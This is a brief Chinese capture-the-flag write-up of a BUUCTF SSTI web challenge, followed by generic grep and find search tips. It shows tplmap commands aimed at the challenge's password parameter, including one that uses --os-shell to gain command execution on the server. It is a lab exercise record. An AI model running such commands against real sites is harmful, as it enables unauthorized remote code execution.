buuctf 刷题记录 [第三章 web进阶]SSTI
buuctf 刷题记录 [第三章 web进阶]SSTI
一打开就password wrong
根据提示ssti
Try
自动化
这里用了个自动化工具
python2 tplmap.py -u "http://33fa6caa-d0a0-44e7-8dd8-e244ff6d05fb.node3.buuoj.cn/?password="
python2 tplmap.py -u "http://33fa6caa-d0a0-44e7-8dd8-e244ff6d05fb.node3.buuoj.cn/?password=" --os-shell
这里我用--os-shell的时候有个bug,就是无法进入目录不过直接ls + 目录就可以
这里根据常规的python ssti的套路就是在server文件里面
当然也可以手工找
比如我用find就没有找到。。。
当然用的是find / -name flag没有找到,其实可以使用搜索指定内容的查找方式
转载来自:https://www.cnblogs.com/linjiqin/p/11678012.html
##文件名+内容
grep -r "查询内容" 文件目录 ##根据时间查找日志 grep '2020-02-27 17:5[6,9]' xinyar-erp-auto.log ##查询指定时间段内的日志 eg、grep -E '2020-02-27 14:5[5-9]|2020-02-28 15:0[0-5]' xinyar-erp-auto.log ##查找关键字 grep -C 10 'aaaa' nohup.out
##只显示包含内容的文件名
grep -r -l "查询内容" 文件目录
##文件名+内容
find 文件目录 -type f |xargs grep "查询内容";
eg:
grep -r "version.app.xinyartech.com" /data/nginx/conf.d
grep -r -l "version.app.xinyartech.com" /data/nginx/conf.d
find /data/nginx/conf.d -type f |xargs grep "version.app.xinyartech.com";
A lion doesn't concern himself with the opinions of a sheep.
分类:
CTF-WEB
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)